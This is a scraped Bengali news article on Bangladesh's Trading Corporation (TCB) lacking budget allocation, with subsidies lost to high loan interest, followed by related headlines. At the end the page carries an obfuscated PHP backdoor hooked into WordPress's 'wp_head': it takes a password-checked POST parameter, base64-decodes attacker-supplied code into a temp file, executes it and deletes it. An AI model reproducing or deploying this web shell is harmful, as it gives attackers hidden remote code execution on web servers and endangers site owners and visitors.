শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

অর্থ সংকটে বাজার নিয়ন্ত্রণে প্রায় নিষ্ক্রিয় টিসিবি

tcbনিউজ ডেস্ক : প্রস্তাবিত বাজেটেও বাজার নিয়ন্ত্রণকারী প্রতিষ্ঠান ট্রেডিং কর্পোরেশন অব বাংলাদেশের (টিসিবি) জন্য কোনো সুখবর থাকছে না।

জনকল্যাণমুখী কার্যক্রম পরিচালনায় রাখা হচ্ছে না কোনো তহবিল। দেয়া হচ্ছে না কোনো বিশেষ বরাদ্দ। এ কারণে বাজার নিয়ন্ত্রণে প্রায় নিষ্ক্রিয় প্রতিষ্ঠানটি।

তাদের সেবা গুটিকয় পণ্যেই সীমিত হয়ে পড়েছে। অর্থ সংকটে পড়ে প্রতিষ্ঠানটি বাজার নিয়ন্ত্রণে বড় ধরনের কোনো ভূমিকা রাখতে পারছে না। ফলে বাজার নিয়ন্ত্রণ ব্যবস্থা চলে গেছে ব্যবসায়ীদের হাতে। এতে প্রায়শই অযৌক্তিক কারণে বিভিন্ন সময় বেড়ে যাচ্ছে দ্রব্যমূল্য।

আওয়ামী লীগের নির্বাচনী ইশতেহারে দেয়া প্রতিশ্রুতি সত্ত্বেও টিসিবির নিজস্ব তহবিল সৃষ্টি কিংবা অর্থ সংকট দূর করার কোনো উদ্যোগ নেয়া হয়নি। তৃতীয় মেয়াদেরও প্রায় তিন বছর পার হতে যাচ্ছে। তবে এবারের বাজেটে কোনো অর্থ পাচ্ছে না টিসিবি।

পরিসংখ্যান ব্যুরোর তথ্য মতে, ১৬ কোটি মানুষের দেশে ৯ কোটি ১০ লাখই অতিদরিদ্র্য, দারিদ্র্য ও নিুবিত্তের। কিন্তু এ বিশালসংখ্যক মানুষের জন্য দ্রব্যমূল্য নিয়ন্ত্রণে সরকারের কার্যকর পদক্ষেপ দেখা যাচ্ছে না।

শুধু তাই নয়, মুক্তবাজার অর্থনীতির কথা বলে সরকার নিজেই বাজারের নিয়ন্ত্রণ ব্যবস্থা ছেড়ে দিচ্ছে ব্যবসায়ীদের হাতে। এতে অসৎ ব্যবসায়ীদের দৌরাত্ম্য বেড়ে যাচ্ছে। গড়ে উঠছে দৃশ্যমান ও অদৃশ্যমান সিন্ডিকেট। ফলে প্রায় সময়ই নিয়ন্ত্রণহীন হয়ে পড়ছে বাজার। যার খেসারত দিতে হচ্ছে সাধারণ ও নিম্ন আয়ের মানুষকে।

জানতে চাইলে কনজ্যুমারস অ্যাসোসিয়েশন অব বাংলাদেশের (ক্যাব) সভাপতি গোলাম রহমান বলেন, বাজার নিয়ন্ত্রণে স্বয়ংসম্পূর্ণতা অর্জনে টিসিবির একটা নিজস্ব মূলধন থাকা দরকার। এ মূলধন পেলে টিসিবি স্বাধীনভাবে পণ্য ক্রয় এবং ভোক্তাপর্যায়ে বিপণন কার্যক্রম পরিচালনা করতে সক্ষম হবে।

তবে এর চেয়েও গুরুত্বপূর্ণ উদ্যোগ হওয়া উচিত টিসিবিকে পরিপূর্ণ স্বাধীনতা দেয়া। আমলাতান্ত্রিক জটিলতা থেকে মুক্ত রাখা। এটি করা সম্ভব হলে নিজস্ব তহবিলেরও প্রয়োজন হবে না। শুধু ভর্তুকি দিলেই চলবে। তাহলেই প্রতিষ্ঠানটি ব্যবসায়ীদের মতো ব্যাংক থেকে যখন তখন ঋণ নিয়েই বাণিজ্যিকভিত্তিতে সারা দেশে তাদের ক্রার্যক্রম সম্প্রসারিত করতে পারবে।

পলিসি রিসার্চ ইন্সটিটিউটের (পিআরআই) নির্বাহী পরিচালক ড. আহসান এইচ মনসুর এ প্রসঙ্গে বলেন, বাজার নিয়ন্ত্রণে টিসিবি ক্রমশই গুরুত্ব হারাতে বসেছে। বিদ্যমান বাজার ব্যবস্থা এখন অনেক বড়। এ বাজার চাহিদায় সীমিত মজুদ দিয়ে কিছুই হবে না।

খোঁজ নিয়ে জানা গেছে, টিসিবির বিক্রিতব্য পণ্য কেনায় তহবিল সংকট প্রকট। একদিকে নিজস্ব স্থায়ী তহবিলের অভাব রয়েছে, অন্যদিকে বছরের পর বছর ব্যয়বহুল কার্যক্রম পরিচালনায়ও থাকছে শূন্য বরাদ্দ। ফলে প্রয়োজনীয় পণ্য কিনতে এখন অর্থ মন্ত্রণালয়কে কাউন্টার গ্যারান্টি দেখাতে হচ্ছে।

এর জন্য টিসিবির আবেদনে বাণিজ্য মন্ত্রণালয়ের আগাম অনুমোদনের প্রয়োজন হচ্ছে। আবার এ অনুমোদিত আবেদনও অর্থ মন্ত্রণালয়ে গিয়ে আমলাতান্ত্রিক জটিলতায় আটকে আছে। এতে বিলম্বিত হচ্ছে অর্থ ছাড় কার্যক্রম। এছাড়া কখনও অর্থ ছাড় পেলেও সেখানে সর্বোচ্চ মিলছে ৮০০ কোটি টাকার নিশ্চয়তা। যা দরিদ্র জনগোষ্ঠীর চাহিদার তুলনায় এ উদ্যোগ খুবই নগণ্য।

আবার শেষ পর্যন্ত যখন চূড়ান্ত অনুমোদন মিলছে ততদিনে দেখা যাচ্ছে, দেশীয় বাজারে সংশ্লিষ্ট পণ্যের মৌসুম ও পর্যাপ্ত সরবরাহ কমে গেছে। সেইসঙ্গে চড়ে গেছে আন্তর্জাতিক বাজারের দরও। এরপরও যখন কেনার উদ্যোগ নেয়া হচ্ছে, তখন অর্থ মন্ত্রণালয়কে ওই কাউন্টার গ্যারান্টি দেখানোর বিপরীতে নেয়া ঋণে গুনতে হচ্ছে চড়া সুদ। গত কয়েক বছরে টিসিবিকে সর্বনিম্ন ১২ থেকে সর্বোচ্চ ২২ শতাংশ পর্যন্ত সুদ গুনতে হয়েছে। এ বিপুল পরিমাণ সুদ ধার্য থাকায় পণ্যের গড়পড়তা দামও বেশি হচ্ছে। কিন্তু ওই পণ্য ভোক্তা পর্যায়ে স্বল্পমূল্যে বিক্রি করতে গিয়ে বিপুল পরিমাণ গচ্চা দিতে হচ্ছে সরকারকে।

পর্যালোচনায় দেখা গেছে, টিসিবির মাধ্যমে সরকারের দেয়া ভর্তুকি অর্থের ৪০ শতাংশই খেয়ে ফেলছে ব্যাংক ঋণের উচ্চ সুদ। ভোক্তার কাছে সর্বাধিক চাহিদাযোগ্য নির্দিষ্ট কয়েকটি পণ্যের সরবরাহ স্বাভাবিক এবং বছরজুড়ে মূল্য স্থিতিশীলতা বজায় রাখার জন্যই এ অর্থ ছাড় হয়ে আসছে। কিন্তু সুদ পরিশোধ খাতে এসব ভর্তুকির প্রায় ৪০ শতাংশ ব্যয় হয়ে যাচ্ছে। বাকি ৬০ শতাংশে আবার ভাগ বসাচ্ছে পরিবহন ব্যয়, গোডাউন ভাড়াসহ অদৃশ্য নানা খাতসহ সার্বিক পরিচালন ব্যয়।

বাণিজ্য মন্ত্রণালয় সম্পর্কিত সংসদীয় স্থায়ী কমিটির প্রতিবেদন মতে, প্রতিবছর টিসিবির পণ্য বিক্রিতে গড় ভর্তুকি যাচ্ছে ৬৮ কোটি ৩১ লাখ ৮০ হাজার টাকা। এছাড়া ভর্তুকি বাবদ গত ৫ বছরে সরকার টিসিবির অনুকূলে মোট ৩৪১ কোটি ৫৯ লাখ টাকা বরাদ্দ দিয়েছে। যেখানে ১৩৬ কোটি টাকাই ব্যয় হয়ে গেছে টিসিবির প্রয়োজনীয় অর্থের জোগান আনতে নেয়া ঋণের উচ্চ সুদ পরিশোধে।

জানা গেছে, টিসিবিকে গতিশীল করতে ২০১২-১৩ অর্থবছরের বাজেটে ৩০০ কোটি টাকা বরাদ্দের জন্য অর্থ মন্ত্রণালয়ের কাছে প্রস্তাব পাঠিয়েছিল বাণিজ্য মন্ত্রণালয়। ওই সময় প্রতিষ্ঠানটির লোকসান কমিয়ে আনতে ভর্তুকি বাবদ আরও ১৪০ কোটি টাকা চেয়েছিল। এরও আগে টিসিবিকে শক্তিশালী করতে বাণিজ্য মন্ত্রণালয়ের সংসদীয় কমিটি এক হাজার কোটি টাকা বরাদ্দের সুপারিশ করেছিল কিন্তু ওই সুপারিশ আমলে নেয়নি অর্থ মন্ত্রণালয়।

সর্বশেষ ২০১৩-১৪ অর্থবছরও বাণিজ্য মন্ত্রণালয় টিসিবির অনুকূলে ২০০ কোটি টাকার থোক বরাদ্দ দেয়ার প্রস্তাব করে। সেটিও মঞ্জুর হয়নি। তবে এবার কোনো প্রস্তাব পাঠায়নি বাণিজ্য মন্ত্রণালয়। সূত্র জানায়, তাদের আগের প্রস্তাবটিই অর্থ মন্ত্রণালয়ের কাছে বিবেচনাধীন রয়েছে।

তবে অর্থ মন্ত্রণালয়ের দায়িত্বশীল সূত্রগুলো বলছে, আগামী বাজেটেও টিসিবির জন্য থোক বরাদ্দ থাকছে না। বর্তমান সরকার ক্ষমতায় আসার আগে নির্বাচনীয় ইশতেহারে প্রথম প্রতিশ্রুতি ছিল দ্রব্যমূল্য নিয়ন্ত্রণ ও সহনীয় পর্যায়ে নিয়ে আসা। ওই প্রতিশ্রুতির অপর অংশে মূল্য নিয়ন্ত্রণের অন্যতম উপায় হিসেবে টিসিবিকে শক্তিশালী করার ওপর গুরুত্বারোপ করা হয়। কিন্তু বর্তমান সরকারের দ্বিতীয় মেয়াদের প্রথম বাজেট থেকে তৃতীয় মেয়াদের প্রস্তাবিত বাজেটেও টিসিবির জন্য এক টাকাও বরাদ্দ রাখা হচ্ছে না।

এ প্রসঙ্গে টিসিবির মুখপাত্র হুমায়ুন কবির জানান, সর্বশেষ ২০০ কোটি টাকা থোক বরাদ্দের জন্য আবেদন করা হয়। এ থোক বরাদ্দ পেলে টিসিবির কার্যক্রম মোটামুটিভাবে পরিচালনা করা যেত। কারণ ব্যাংক ঋণ নিয়ে পণ্য ক্রয় করতে হচ্ছে।

এক্ষেত্রে ঋণের সুদ ১২ থেকে ১৫ শতাংশ পর্যন্ত গুনতে হচ্ছে। ব্যাংক সুদসহ হিসাব করে পণ্য ক্রয় করতে হচ্ছে। কিন্তু টিসিবির নিজেস্ব ফান্ড থাকলে সেক্ষেত্রে সুদ গুনতে হতো না। ভর্তুকির পরিমাণ আরও কমে আসত।যুগান্তর

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}